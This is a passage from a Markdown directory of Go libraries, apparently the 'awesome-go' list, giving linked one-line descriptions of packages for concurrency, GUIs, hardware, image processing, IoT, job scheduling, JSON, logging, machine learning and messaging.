multiple goroutines.\n- [Hunch](https://github.com/AaronJan/Hunch) - Hunch provides functions like: `All`, `First`, `Retry`, `Waterfall` etc., that makes asynchronous flow control more intuitive.\n- [kyoo](https://github.com/dirkaholic/kyoo) - Provides an unlimited job queue and concurrent worker pools.\n- [neilotoole/errgroup](https://github.com/neilotoole/errgroup) - Drop-in alternative to `sync/errgroup`, limited to a pool of N worker goroutines.\n- [nursery](https://github.com/arunsworld/nursery) - Structured concurrency in Go.\n- [oversight](https://cirello.io/oversight) - Oversight is a complete implementation of the Erlang supervision trees.\n- [parallel-fn](https://github.com/rafaeljesus/parallel-fn) - Run functions in parallel.\n- [pond](https://github.com/alitto/pond) - Minimalistic and High-performance goroutine worker pool written in Go.\n- [pool](https://github.com/go-playground/pool) - Limited consumer goroutine or unlimited goroutine pool for easier goroutine handling and cancellation.\n- [queue](https://github.com/AnikHasibul/queue) - Gives you a `sync.WaitGroup` like queue group accessibility. Helps you to throttle and limit goroutines, wait for the end of the all goroutines and much more.\n- [routine](https://github.com/timandy/routine) - `routine` is a `ThreadLocal` for go library. It encapsulates and provides some easy-to-use, non-competitive, high-performance `goroutine` context access interfaces, which can help you access coroutine context information more gracefully.\n- [routine](https://github.com/x-mod/routine) - go routine control with context, support: Main, Go, Pool and some useful Executors.\n- [semaphore](https://github.com/kamilsk/semaphore) - Semaphore pattern implementation with timeout of lock/unlock operations based on channel and context.\n- [semaphore](https://github.com/marusama/semaphore) - Fast resizable semaphore implementation based on CAS (faster than channel-based semaphore implementations).\n- [stl](https://github.com/ssgreg/stl) - Software transactional locks based on Software Transactional Memory (STM) concurrency control mechanism.\n- [threadpool](https://github.com/shettyh/threadpool) - Golang threadpool implementation.\n- [tunny](https://github.com/Jeffail/tunny) - Goroutine pool for golang.\n- [worker-pool](https://github.com/vardius/worker-pool) - goworker is a Go simple async worker pool.\n- [workerpool](https://github.com/gammazero/workerpool) - Goroutine pool that limits the concurrency of task execution, not the number of tasks queued.\n\n**[⬆ back to top](#contents)**\n\n## GUI\n\n_Libraries for building GUI Applications._\n\n_Toolkits_\n\n- [app](https://github.com/murlokswarm/app) - Package to create apps with GO, HTML and CSS. Supports: MacOS, Windows in progress.\n- [fyne](https://github.com/fyne-io/fyne) - Cross platform native GUIs designed for Go based on Material Design. Supports: Linux, macOS, Windows, BSD, iOS and Android.\n- [gio](https://gioui.org) - Gio is a library for writing cross-platform immediate mode GUI-s in Go. Gio supports all the major platforms: Linux, macOS, Windows, Android, iOS, FreeBSD, OpenBSD and WebAssembly.\n- [go-astilectron](https://github.com/asticode/go-astilectron) - Build cross platform GUI apps with GO and HTML/JS/CSS (powered by Electron).\n- [go-gtk](https://mattn.github.io/go-gtk/) - Go bindings for GTK.\n- [go-sciter](https://github.com/sciter-sdk/go-sciter) - Go bindings for Sciter: the Embeddable HTML/CSS/script engine for modern desktop UI development. Cross platform.\n- [goradd/html5tag](https://github.com/goradd/html5tag) - Library for outputting HTML5 tags.\n- [gotk3](https://github.com/gotk3/gotk3) - Go bindings for GTK3.\n- [gowd](https://github.com/dtylman/gowd) - Rapid and simple desktop UI development with GO, HTML, CSS and NW.js. Cross platform.\n- [qt](https://github.com/therecipe/qt) - Qt binding for Go (support for Windows / macOS / Linux / Android / iOS / Sailfish OS / Raspberry Pi).\n- [ui](https://github.com/andlabs/ui) - Platform-native GUI library for Go. Cross platform.\n- [Wails](https://wails.io) - Mac, Windows, Linux desktop apps with HTML UI using built-in OS HTML renderer.\n- [walk](https://github.com/lxn/walk) - Windows application library kit for Go.\n- [webview](https://github.com/zserge/webview) - Cross-platform webview window with simple two-way JavaScript bindings (Windows / macOS / Linux).\n\n_Interaction_\n\n- [AppIndicator Go](https://github.com/gopherlibs/appindicator) - Go bindings for libappindicator3 C library.\n- [gosx-notifier](https://github.com/deckarep/gosx-notifier) - OSX Desktop Notifications library for Go.\n- [mac-activity-tracker](https://github.com/prashantgupta24/activity-tracker) - OSX library to notify about any (pluggable) activity on your machine.\n- [mac-sleep-notifier](https://github.com/prashantgupta24/mac-sleep-notifier) - OSX Sleep/Wake notifications in golang.\n- [robotgo](https://github.com/go-vgo/robotgo) - Go Native cross-platform GUI system automation. Control the mouse, keyboard and other.\n- [systray](https://github.com/getlantern/systray) - Cross platform Go library to place an icon and menu in the notification area.\n- [trayhost](https://github.com/shurcooL/trayhost) - Cross-platform Go library to place an icon in the host operating system's taskbar.\n- [zenity](https://github.com/ncruces/zenity) - Cross-platform Go library and CLI to create simple dialogs that interact graphically with the user.\n\n**[⬆ back to top](#contents)**\n\n## Hardware\n\n_Libraries, tools, and tutorials for interacting with hardware._\n\n- [arduino-cli](https://github.com/arduino/arduino-cli) - Official Arduino CLI and library. Can run standalone, or be incorporated into larger Go projects.\n- [emgo](https://github.com/ziutek/emgo) - Go-like language for programming embedded systems (e.g. STM32 MCU).\n- [ghw](https://github.com/jaypipes/ghw) - Golang hardware discovery/inspection library.\n- [go-osc](https://github.com/hypebeast/go-osc) - Open Sound Control (OSC) bindings for Go.\n- [go-rpio](https://github.com/stianeikeland/go-rpio) - GPIO for Go, doesn't require cgo.\n- [goroslib](https://github.com/aler9/goroslib) - Robot Operating System (ROS) library for Go.\n- [joystick](https://github.com/0xcafed00d/joystick) - a polled API to read the state of an attached joystick.\n- [sysinfo](https://github.com/zcalusic/sysinfo) - A pure Go library providing Linux OS / kernel / hardware system information.\n\n**[⬆ back to top](#contents)**\n\n## Images\n\n_Libraries for manipulating images._\n\n- [bild](https://github.com/anthonynsimon/bild) - Collection of image processing algorithms in pure Go.\n- [bimg](https://github.com/h2non/bimg) - Small package for fast and efficient image processing using libvips.\n- [cameron](https://github.com/aofei/cameron) - An avatar generator for Go.\n- [canvas](https://github.com/tdewolff/canvas) - Vector graphics to PDF, SVG or rasterized image.\n- [color-extractor](https://github.com/marekm4/color-extractor) - Dominant color extractor with no external dependencies.\n- [darkroom](https://github.com/gojek/darkroom) - An image proxy with changeable storage backends and image processing engines with focus on speed and resiliency.\n- [draft](https://github.com/lucasepe/draft) - Generate High Level Microservice Architecture diagrams for GraphViz using simple YAML syntax.\n- [geopattern](https://github.com/pravj/geopattern) - Create beautiful generative image patterns from a string.\n- [gg](https://github.com/fogleman/gg) - 2D rendering in pure Go.\n- [gift](https://github.com/disintegration/gift) - Package of image processing filters.\n- [gltf](https://github.com/qmuntal/gltf) - Efficient and robust glTF 2.0 reader, writer and validator.\n- [go-cairo](https://github.com/ungerik/go-cairo) - Go binding for the cairo graphics library.\n- [go-gd](https://github.com/bolknote/go-gd) - Go binding for GD library.\n- [go-nude](https://github.com/koyachi/go-nude) - Nudity detection with Go.\n- [go-webcolors](https://github.com/jyotiska/go-webcolors) - Port of webcolors library from Python to Go.\n- [go-webp](https://github.com/kolesa-team/go-webp) - Library for encode and decode webp pictures, using libwebp.\n- [gocv](https://github.com/hybridgroup/gocv) - Go package for computer vision using OpenCV 3.3+.\n- [goimagehash](https://github.com/corona10/goimagehash) - Go Perceptual image hashing package.\n- [goimghdr](https://github.com/corona10/goimghdr) - The imghdr module determines the type of image contained in a file for Go.\n- [govatar](https://github.com/o1egl/govatar) - Library and CMD tool for generating funny avatars.\n- [govips](https://github.com/davidbyttow/govips) - A lightning fast image processing and resizing library for Go.\n- [gowitness](https://github.com/sensepost/gowitness) - Screenshoting webpages using go and headless chrome on command line.\n- [gridder](https://github.com/shomali11/gridder) - A Grid based 2D Graphics library.\n- [image2ascii](https://github.com/qeesung/image2ascii) - Convert image to ASCII.\n- [imagick](https://github.com/gographics/imagick) - Go binding to ImageMagick's MagickWand C API.\n- [imaginary](https://github.com/h2non/imaginary) - Fast and simple HTTP microservice for image resizing.\n- [imaging](https://github.com/disintegration/imaging) - Simple Go image processing package.\n- [img](https://github.com/hawx/img) - Selection of image manipulation tools.\n- [ln](https://github.com/fogleman/ln) - 3D line art rendering in Go.\n- [mergi](https://github.com/noelyahan/mergi) - Tool & Go library for image manipulation (Merge, Crop, Resize, Watermark, Animate).\n- [mort](https://github.com/aldor007/mort) - Storage and image processing server written in Go.\n- [mpo](https://github.com/donatj/mpo) - Decoder and conversion tool for MPO 3D Photos.\n- [picfit](https://github.com/thoas/picfit) - An image resizing server written in Go.\n- [pt](https://github.com/fogleman/pt) - Path tracing engine written in Go.\n- [resize](https://github.com/nfnt/resize) - Image resizing for Go with common interpolation methods.\n- [rez](https://github.com/bamiaux/rez) - Image resizing in pure Go and SIMD.\n- [scout](https://github.com/jonoton/scout) - Scout is a standalone open source software solution for DIY video security.\n- [smartcrop](https://github.com/muesli/smartcrop) - Finds good crops for arbitrary images and crop sizes.\n- [steganography](https://github.com/auyer/steganography) - Pure Go Library for LSB steganography.\n- [stegify](https://github.com/DimitarPetrov/stegify) - Go tool for LSB steganography, capable of hiding any file within an image.\n- [svgo](https://github.com/ajstarks/svgo) - Go Language Library for SVG generation.\n- [tga](https://github.com/ftrvxmtrx/tga) - Package tga is a TARGA image format decoder/encoder.\n- [webp-server](https://github.com/mehdipourfar/webp-server) - Simple and minimal image server capable of storing, resizing, converting and caching images.\n\n**[⬆ back to top](#contents)**\n\n## IoT (Internet of Things)\n\n_Libraries for programming devices of the IoT._\n\n- [connectordb](https://github.com/connectordb/connectordb) - Open-Source Platform for Quantified Self & IoT.\n- [devices](https://github.com/goiot/devices) - Suite of libraries for IoT devices, experimental for x/exp/io.\n- [ekuiper](https://github.com/lf-edge/ekuiper) - Lightweight data stream processing engine for IoT edge.\n- [eywa](https://github.com/xcodersun/eywa) - Project Eywa is essentially a connection manager that keeps track of connected devices.\n- [flogo](https://github.com/tibcosoftware/flogo) - Project Flogo is an Open Source Framework for IoT Edge Apps & Integration.\n- [gatt](https://github.com/paypal/gatt) - Gatt is a Go package for building Bluetooth Low Energy peripherals.\n- [gobot](https://github.com/hybridgroup/gobot/) - Gobot is a framework for robotics, physical computing, and the Internet of Things.\n- [huego](https://github.com/amimof/huego) - An extensive Philips Hue client library for Go.\n- [iot](https://github.com/vaelen/iot/) - IoT is a simple framework for implementing a Google IoT Core device.\n- [mainflux](https://github.com/Mainflux/mainflux) - Industrial IoT Messaging and Device Management Server.\n- [periph](https://periph.io/) - Peripherals I/O to interface with low-level board facilities.\n- [sensorbee](https://github.com/sensorbee/sensorbee) - Lightweight stream processing engine for IoT.\n\n**[⬆ back to top](#contents)**\n\n## Job Scheduler\n\n_Libraries for scheduling jobs._\n\n- [cdule](https://github.com/deepaksinghvi/cdule) - Job scheduler library with database support\n- [cheek](https://github.com/datarootsio/cheek) - A simple crontab like scheduler that aims to offer a KISS approach to job scheduling.\n- [clockwerk](https://github.com/onatm/clockwerk) - Go package to schedule periodic jobs using a simple, fluent syntax.\n- [cronticker](https://github.com/krayzpipes/cronticker) - A ticker implementation to support cron schedules.\n- [Dagu](https://github.com/dagu-go/dagu) - No-code workflow executor. it executes DAGs defined in a simple YAML format.\n- [go-cron](https://github.com/rk/go-cron) - Simple Cron library for go that can execute closures or functions at varying intervals, from once a second to once a year on a specific date and time. Primarily for web applications and long running daemons.\n- [go-quartz](https://github.com/reugn/go-quartz) - Simple, zero-dependency scheduling library for Go.\n- [gocron](https://github.com/go-co-op/gocron) - Easy and fluent Go job scheduling. This is an actively maintained fork of [jasonlvhit/gocron](https://github.com/jasonlvhit/gocron).\n- [goflow](https://github.com/fieldryand/goflow) - A simple but powerful DAG scheduler and dashboard.\n- [gron](https://github.com/roylee0704/gron) - Define time-based tasks using a simple Go API and Gron’s scheduler will run them accordingly.\n- [gronx](https://github.com/adhocore/gronx) - Cron expression parser, task runner and daemon consuming crontab like task list.\n- [JobRunner](https://github.com/bamzi/jobrunner) - Smart and featureful cron job scheduler with job queuing and live monitoring built in.\n- [jobs](https://github.com/albrow/jobs) - Persistent and flexible background jobs library.\n- [leprechaun](https://github.com/kilgaloon/leprechaun) - Job scheduler that supports webhooks, crons and classic scheduling.\n- [sched](https://github.com/romshark/sched) - A job scheduler with the ability to fast-forward time.\n- [scheduler](https://github.com/carlescere/scheduler) - Cronjobs scheduling made easy.\n- [tasks](https://github.com/madflojo/tasks) - An easy to use in-process scheduler for recurring tasks in Go.\n\n**[⬆ back to top](#contents)**\n\n## JSON\n\n_Libraries for working with JSON._\n\n- [ajson](https://github.com/spyzhov/ajson) - Abstract JSON for golang with JSONPath support.\n- [ask](https://github.com/simonnilsson/ask) - Easy access to nested values in maps and slices. Works in combination with encoding/json and other packages that \"Unmarshal\" arbitrary data into Go data-types.\n- [dynjson](https://github.com/cocoonspace/dynjson) - Client-customizable JSON formats for dynamic APIs.\n- [ej](https://github.com/lucassscaravelli/ej) - Write and read JSON from different sources succinctly.\n- [epoch](https://github.com/vtopc/epoch) - Contains primitives for marshaling/unmarshaling Unix timestamp/epoch to/from build-in time.Time type in JSON.\n- [fastjson](https://github.com/valyala/fastjson) - Fast JSON parser and validator for Go. No custom structs, no code generation, no reflection.\n- [gjo](https://github.com/skanehira/gjo) - Small utility to create JSON objects.\n- [GJSON](https://github.com/tidwall/gjson) - Get a JSON value with one line of code.\n- [go-jsonerror](https://github.com/ddymko/go-jsonerror) - Go-JsonError is meant to allow us to easily create json response errors that follow the JsonApi spec.\n- [go-respond](https://github.com/nicklaw5/go-respond) - Go package for handling common HTTP JSON responses.\n- [gojmapr](https://github.com/limiu82214/gojmapr) - Get simple struct from complex json by json path.\n- [gojq](https://github.com/elgs/gojq) - JSON query in Golang.\n- [gojson](https://github.com/ChimeraCoder/gojson) - Automatically generate Go (golang) struct definitions from example JSON.\n- [htmljson](https://github.com/nikolaydubina/htmljson) - Rich rendering of JSON as HTML in Go.\n- [JayDiff](https://github.com/yazgazan/jaydiff) - JSON diff utility written in Go.\n- [jettison](https://github.com/wI2L/jettison) - Fast and flexible JSON encoder for Go.\n- [jscan](https://github.com/romshark/jscan) - High performance zero-allocation JSON iterator.\n- [JSON-to-Go](https://mholt.github.io/json-to-go/) - Convert JSON to Go struct.\n- [JSON-to-Proto](https://json-to-proto.github.io/) - Convert JSON to Protobuf online.\n- [json2go](https://github.com/m-zajac/json2go) - Advanced JSON to Go struct conversion. Provides package that can parse multiple JSON documents and create struct to fit them all.\n- [jsonapi-errors](https://github.com/AmuzaTkts/jsonapi-errors) - Go bindings based on the JSON API errors reference.\n- [jsoncolor](https://github.com/neilotoole/jsoncolor) - Drop-in replacement for `encoding/json` that outputs colorized JSON.\n- [jsondiff](https://github.com/wI2L/jsondiff) - JSON diff library for Go based on RFC6902 (JSON Patch).\n- [jsonf](https://github.com/miolini/jsonf) - Console tool for highlighted formatting and struct query fetching JSON.\n- [jsongo](https://github.com/ricardolonga/jsongo) - Fluent API to make it easier to create Json objects.\n- [jsonhal](https://github.com/RichardKnop/jsonhal) - Simple Go package to make custom structs marshal into HAL compatible JSON responses.\n- [jsonhandlers](https://github.com/abusomani/jsonhandlers) - JSON library to expose simple handlers that lets you easily read and write json from various sources.\n- [jsonic](https://github.com/sinhashubham95/jsonic) - Utilities to handle and query JSON without defining structs in a type safe manner.\n- [jsonvalue](https://github.com/Andrew-M-C/go.jsonvalue) - A fast and convinient library for unstructured JSON data, replacing `encoding/json`.\n- [jzon](https://github.com/zerosnake0/jzon) - JSON library with standard compatible API/behavior.\n- [kazaam](https://github.com/Qntfy/kazaam) - API for arbitrary transformation of JSON documents.\n- [mapslice-json](https://github.com/mickep76/mapslice-json) - Go MapSlice for ordered marshal/ unmarshal of maps in JSON.\n- [marshmallow](https://github.com/PerimeterX/marshmallow) - Performant JSON unmarshaling for flexible use cases.\n- [mp](https://github.com/sanbornm/mp) - Simple cli email parser. It currently takes stdin and outputs JSON.\n- [OjG](https://github.com/ohler55/ojg) - Optimized JSON for Go is a high performance parser with a variety of additional JSON tools including JSONPath.\n- [omg.jsonparser](https://github.com/dedalqq/omg.jsonparser) - Simple JSON parser with validation by condition via golang struct fields tags.\n- [ujson](https://github.com/olvrng/ujson) - Fast and minimal JSON parser and transformer that works on unstructured JSON.\n- [vjson](https://github.com/miladibra10/vjson) - Go package for validating JSON objects with declaring a JSON schema with fluent API.\n\n**[⬆ back to top](#contents)**\n\n## Logging\n\n_Libraries for generating and working with log files._\n\n- [distillog](https://github.com/amoghe/distillog) - distilled levelled logging (think of it as stdlib + log levels).\n- [glg](https://github.com/kpango/glg) - glg is simple and fast leveled logging library for Go.\n- [glo](https://github.com/lajosbencz/glo) - PHP Monolog inspired logging facility with identical severity levels.\n- [glog](https://github.com/golang/glog) - Leveled execution logs for Go.\n- [go-cronowriter](https://github.com/utahta/go-cronowriter) - Simple writer that rotate log files automatically based on current date and time, like cronolog.\n- [go-log](https://github.com/pieterclaerhout/go-log) - A logging library with stack traces, object dumping and optional timestamps.\n- [go-log](https://github.com/subchen/go-log) - Simple and configurable Logging in Go, with level, formatters and writers.\n- [go-log](https://github.com/siddontang/go-log) - Log lib supports level and multi handlers.\n- [go-log](https://github.com/ian-kent/go-log) - Log4j implementation in Go.\n- [go-logger](https://github.com/apsdehal/go-logger) - Simple logger of Go Programs, with level handlers.\n- [gologger](https://github.com/sadlil/gologger) - Simple easy to use log lib for go, logs in Colored Console, Simple Console, File or Elasticsearch.\n- [gomol](https://github.com/aphistic/gomol) - Multiple-output, structured logging for Go with extensible logging outputs.\n- [gone/log](https://github.com/One-com/gone/tree/master/log) - Fast, extendable, full-featured, std-lib source compatible log library.\n- [httpretty](https://github.com/henvic/httpretty) - Pretty-prints your regular HTTP requests on your terminal for debugging (similar to http.DumpRequest).\n- [journald](https://github.com/ssgreg/journald) - Go implementation of systemd Journal's native API for logging.\n- [kemba](https://github.com/clok/kemba) - A tiny debug logging tool inspired by [debug](https://github.com/visionmedia/debug), great for CLI tools and applications.\n- [log](https://github.com/aerogo/log) - An O(1) logging system that allows you to connect one log to multiple writers (e.g. stdout, a file and a TCP connection).\n- [log](https://github.com/apex/log) - Structured logging package for Go.\n- [log](https://github.com/go-playground/log) - Simple, configurable and scalable Structured Logging for Go.\n- [log](https://github.com/teris-io/log) - Structured log interface for Go cleanly separates logging facade from its implementation.\n- [log](https://github.com/heartwilltell/log) - Simple leveled logging wrapper around standard log package.\n- [log](https://github.com/no-src/log) - A simple logging framework out of the box.\n- [log-voyage](https://github.com/firstrow/logvoyage) - Full-featured logging saas written in golang.\n- [log15](https://github.com/inconshreveable/log15) - Simple, powerful logging for Go.\n- [logdump](https://github.com/ewwwwwqm/logdump) - Package for multi-level logging.\n- [logex](https://github.com/chzyer/logex) - Golang log lib, supports tracking and level, wrap by standard log lib.\n- [logger](https://github.com/azer/logger) - Minimalistic logging library for Go.\n- [logmatic](https://github.com/borderstech/logmatic) - Colorized logger for Golang with dynamic log level configuration.\n- [logo](https://github.com/mbndr/logo) - Golang logger to different configurable writers.\n- [logrus](https://github.com/Sirupsen/logrus) - Structured logger for Go.\n- [logrusiowriter](https://github.com/cabify/logrusiowriter) - `io.Writer` implementation using [logrus](https://github.com/sirupsen/logrus) logger.\n- [logrusly](https://github.com/sebest/logrusly) - [logrus](https://github.com/sirupsen/logrus) plug-in to send errors to a [Loggly](https://www.loggly.com/).\n- [logur](https://github.com/logur/logur) - An opinionated logger interface and collection of logging best practices with adapters and integrations for well-known libraries ([logrus](https://github.com/sirupsen/logrus), [go-kit log](https://github.com/go-kit/kit/tree/master/log), [zap](https://github.com/uber-go/zap), [zerolog](https://github.com/rs/zerolog), etc).\n- [logutils](https://github.com/hashicorp/logutils) - Utilities for slightly better logging in Go (Golang) extending the standard logger.\n- [logxi](https://github.com/mgutz/logxi) - 12-factor app logger that is fast and makes you happy.\n- [lumberjack](https://github.com/natefinch/lumberjack) - Simple rolling logger, implements io.WriteCloser.\n- [mlog](https://github.com/jbrodriguez/mlog) - Simple logging module for go, with 5 levels, an optional rotating logfile feature and stdout/stderr output.\n- [noodlog](https://github.com/gyozatech/noodlog) - Parametrized JSON logging library which lets you obfuscate sensitive data and marshal any kind of content. No more printed pointers instead of values, nor escape chars for the JSON strings.\n- [onelog](https://github.com/francoispqt/onelog) - Onelog is a dead simple but very efficient JSON logger. It is the fastest JSON logger out there in all scenarios. Also, it is one of the logger with the lowest allocation.\n- [ozzo-log](https://github.com/go-ozzo/ozzo-log) - High performance logging supporting log severity, categorization, and filtering. Can send filtered log messages to various targets (e.g. console, network, mail).\n- [phuslu/log](https://github.com/phuslu/log) - High performance structured logging.\n- [pp](https://github.com/k0kubun/pp) - Colored pretty printer for Go language.\n- [rollingwriter](https://github.com/arthurkiller/rollingWriter) - RollingWriter is an auto-rotate `io.Writer` implementation with multi policies to provide log file rotation.\n- [seelog](https://github.com/cihub/seelog) - Logging functionality with flexible dispatching, filtering, and formatting.\n- [slf4g](https://github.com/echocat/slf4g) - Simple Logging Facade for Golang: Simple structured logging; but powerful, extendable and customizable, with huge amount of learnings from decades of past logging frameworks.\n- [slog](https://github.com/gookit/slog) - Lightweight, configurable, extensible logger for Go.\n- [slog-formatter](https://github.com/samber/slog-formatter) - Common formatters for slog and helpers to build your own.\n- [slog-multi](https://github.com/samber/slog-multi) - Chain of slog.Handler (pipeline, fanout...).\n- [spew](https://github.com/davecgh/go-spew) - Implements a deep pretty printer for Go data structures to aid in debugging.\n- [sqldb-logger](https://github.com/simukti/sqldb-logger) - A logger for Go SQL database driver without modify existing \\*sql.DB stdlib usage.\n- [stdlog](https://github.com/alexcesaro/log) - Stdlog is an object-oriented library providing leveled logging. It is very useful for cron jobs.\n- [structy/log](https://github.com/structy/log) - A simple to use log system, minimalist but with features for debugging and differentiation of messages.\n- [tail](https://github.com/hpcloud/tail) - Go package striving to emulate the features of the BSD tail program.\n- [tint](https://github.com/lmittmann/tint) - A slog.Handler that writes tinted logs.\n- [xlog](https://github.com/xfxdev/xlog) - Plugin architecture and flexible log system for Go, with level ctrl, multiple log target and custom log format.\n- [xlog](https://github.com/rs/xlog) - Structured logger for `net/context` aware HTTP handlers with flexible dispatching.\n- [xylog](https://github.com/xybor-x/xylog) - Leveled and structured logging, dynamic fields, high performance, zone management, simple configuration, and readable syntax.\n- [yell](https://github.com/jfcg/yell) - Yet another minimalistic logging library.\n- [zap](https://github.com/uber-go/zap) - Fast, structured, leveled logging in Go.\n- [zax](https://github.com/yuseferi/zax) - Integrate Context with Zap logger, which leads to more flexibility in Go logging.\n- [zerolog](https://github.com/rs/zerolog) - Zero-allocation JSON logger.\n- [zkits-logger](https://github.com/edoger/zkits-logger) - A powerful zero-dependency JSON logger.\n\n**[⬆ back to top](#contents)**\n\n## Machine Learning\n\n_Libraries for Machine Learning._\n\n- [bayesian](https://github.com/jbrukh/bayesian) - Naive Bayesian Classification for Golang.\n- [CloudForest](https://github.com/ryanbressler/CloudForest) - Fast, flexible, multi-threaded ensembles of decision trees for machine learning in pure Go.\n- [ddt](https://github.com/sgrodriguez/ddt) - Dynamic decision tree, create trees defining customizable rules.\n- [eaopt](https://github.com/MaxHalford/eaopt) - An evolutionary optimization library.\n- [evoli](https://github.com/khezen/evoli) - Genetic Algorithm and Particle Swarm Optimization library.\n- [fonet](https://github.com/Fontinalis/fonet) - A Deep Neural Network library written in Go.\n- [go-cluster](https://github.com/e-XpertSolutions/go-cluster) - Go implementation of the k-modes and k-prototypes clustering algorithms.\n- [go-deep](https://github.com/patrikeh/go-deep) - A feature-rich neural network library in Go.\n- [go-fann](https://github.com/white-pony/go-fann) - Go bindings for Fast Artificial Neural Networks(FANN) library.\n- [go-featureprocessing](https://github.com/nikolaydubina/go-featureprocessing) - Fast and convenient feature processing for low latency machine learning in Go.\n- [go-galib](https://github.com/thoj/go-galib) - Genetic Algorithms library written in Go / golang.\n- [go-pr](https://github.com/daviddengcn/go-pr) - Pattern recognition package in Go lang.\n- [gobrain](https://github.com/goml/gobrain) - Neural Networks written in go.\n- [godist](https://github.com/e-dard/godist) - Various probability distributions, and associated methods.\n- [goga](https://github.com/tomcraven/goga) - Genetic algorithm library for Go.\n- [GoLearn](https://github.com/sjwhitworth/golearn) - General Machine Learning library for Go.\n- [golinear](https://github.com/danieldk/golinear) - liblinear bindings for Go.\n- [GoMind](https://github.com/surenderthakran/gomind) - A simplistic Neural Network Library in Go.\n- [goml](https://github.com/cdipaolo/goml) - On-line Machine Learning in Go.\n- [gonet](https://github.com/dathoangnd/gonet) - Neural Network for Go.\n- [Goptuna](https://github.com/c-bata/goptuna) - Bayesian optimization framework for black-box functions written in Go. Everything will be optimized.\n- [goRecommend](https://github.com/timkaye11/goRecommend) - Recommendation Algorithms library written in Go.\n- [gorgonia](https://github.com/gorgonia/gorgonia) - graph-based computational library like Theano for Go that provides primitives for building various machine learning and neural network algorithms.\n- [gorse](https://github.com/zhenghaoz/gorse) - An offline recommender system backend based on collaborative filtering written in Go.\n- [goscore](https://github.com/asafschers/goscore) - Go Scoring API for PMML.\n- [gosseract](https://github.com/otiai10/gosseract) - Go package for OCR (Optical Character Recognition), by using Tesseract C++ library.\n- [libsvm](https://github.com/datastream/libsvm) - libsvm golang version derived work based on LIBSVM 3.14.\n- [m2cgen](https://github.com/BayesWitnesses/m2cgen) - A CLI tool to transpile trained classic ML models into a native Go code with zero dependencies, written in Python with Go language support.\n- [neat](https://github.com/jinyeom/neat) - Plug-and-play, parallel Go framework for NeuroEvolution of Augmenting Topologies (NEAT).\n- [neural-go](https://github.com/schuyler/neural-go) - Multilayer perceptron network implemented in Go, with training via backpropagation.\n- [ocrserver](https://github.com/otiai10/ocrserver) - A simple OCR API server, seriously easy to be deployed by Docker and Heroku.\n- [onnx-go](https://github.com/owulveryck/onnx-go) - Go Interface to Open Neural Network Exchange (ONNX).\n- [probab](https://github.com/ThePaw/probab) - Probability distribution functions. Bayesian inference. Written in pure Go.\n- [randomforest](https://github.com/malaschitz/randomForest) - Easy to use Random Forest library for Go.\n- [regommend](https://github.com/muesli/regommend) - Recommendation & collaborative filtering engine.\n- [shield](https://github.com/eaigner/shield) - Bayesian text classifier with flexible tokenizers and storage backends for Go.\n- [tfgo](https://github.com/galeone/tfgo) - Easy to use Tensorflow bindings: simplifies the usage of the official Tensorflow Go bindings. Define computational graphs in Go, load and execute models trained in Python.\n- [Varis](https://github.com/Xamber/Varis) - Golang Neural Network.\n\n**[⬆ back to top](#contents)**\n\n## Messaging\n\n_Libraries that implement messaging systems._\n\n- [ami](https://github.com/kak-tus/ami) - Go client to reliable queues based on Redis Cluster Streams.\n- [amqp](https://github.com/rabbitmq/amqp091-go) - Go RabbitMQ Client Library.\n- [APNs2](https://github.com/sideshow/apns2) - HTTP/2 Apple Push Notification provider for Go — Send push notifications to iOS, tvOS, Safari and OSX apps.\n- [Asynq](https://github.com/hibiken/asynq) - A simple, reliable, and efficient distributed task queue for Go built on top of Redis.\n- [Beaver](https://github.com/Clivern/Beaver) - A real time messaging server to build a scalable in-app notifications, multiplayer games, chat apps in web and mobile apps.\n- [Benthos](https://github.com/Jeffail/benthos) - A message streaming bridge between a range of protocols.\n- [Bus](https://github.com/mustafaturan/bus) - Minimalist message bus implementation for internal communication.\n- [Centrifugo](https://github.com/centrifugal/centrifugo) - Real-time messaging (Websockets or SockJS) server in Go.\n- [Chanify](https://github.com/chanify/chanify) - A push notification server send message to your iOS devices.\n- [Commander](https://github.com/jeroenrinzema/commander) - A high-level event driven consumer/producer supporting various \"dialects\" such as Apache Kafka.\n- [Confluent Kafka Golang Client](https://github.com/confluentinc/confluent-kafka-go) - confluent-kafka-go is Confluent's Golang client for Apache Kafka and the Confluent Platform.\n- [dbus](https://github.com/godbus/dbus) - Native Go bindings for D-Bus.\n- [drone-line](https://github.com/appleboy/drone-line) - Sending [Line](https://at.line.me/en) notifications using a binary, docker or Drone CI.\n- [emitter](https://github.com/olebedev/emitter) - Emits events using Go way, with wildcard, predicates, cancellation possibilities and many other good wins.\n- [event](https://github.com/agoalofalife/event) - Implementation of the pattern observer.\n- [EventBus](https://github.com/asaskevich/EventBus) - The lightweight event bus with async compatibility.\n- [gaurun-client](https://github.com/osamingo/gaurun-client) - Gaurun Client written in Go.\n- [Glue](https://github.com/desertbit/glue) - Robust Go and Javascript Socket Library (Alternative to Socket.io).\n- [go-mq](https://github.com/cheshir/go-mq) - RabbitMQ client with declarative configuration.\n- [go-notify](https://github.com/TheCreeper/go-notify) - Native implementation of the freedesktop notification spec.\n- [go-nsq](https://github.com/nsqio/go-nsq) - the official Go package for NSQ.\n- [go-res](https://github.com/jirenius/go-res) - Package for building REST/real-time services where clients are synchronized seamlessly, using NATS and Resgate.\n- [go-socket.io](https://github.com/googollee/go-socket.io) - socket.io library for golang, a realtime application framework.\n- [go-vitotrol](https://github.com/maxatome/go-vitotrol) - Client library to Viessmann Vitotrol web service.\n- [Gollum](https://github.com/trivago/gollum) - A n:m multiplexer that gathers messages from different sources and broadcasts them to a set of destinations.\n- [golongpoll](https://github.com/jcuga/golongpoll) - HTTP longpoll server library that makes web pub-sub simple.\n- [gopush-cluster](https://github.com/Terry-Mao/gopush-cluster) - gopush-cluster is a go push server cluster.\n- [gorush](https://github.com/appleboy/gorush) - Push notification server using [APNs2](https://github.com/sideshow/apns2) and google [GCM](https://github.com/google/go-gcm).\n- [gosd](https://github.com/alexsniffin/gosd) - A library for scheduling when to dispatch a message to a channel.\n- [guble](https://github.com/smancke/guble) - Messaging server using push notifications (Google Firebase Cloud Messaging, Apple Push Notification services, SMS) as well as websockets, a REST API, featuring distributed operation and message-persistence.\n- [hare](https://github.com/leozz37/hare) - A user friendly library for sending messages and listening to TCP sockets.\n- [hub](https://github.com/leandro-lugaresi/hub) - A Message/Event Hub for Go applications, using publish/subscribe pattern with support for alias like rabbitMQ exchanges.\n- [jazz](https://github.com/socifi/jazz) - A simple RabbitMQ abstraction layer for queue administration and publishing and consuming of messages.\n- [machinery](https://github.com/RichardKnop/machinery) - Asynchronous task queue/job queue based on distributed message passing.\n- 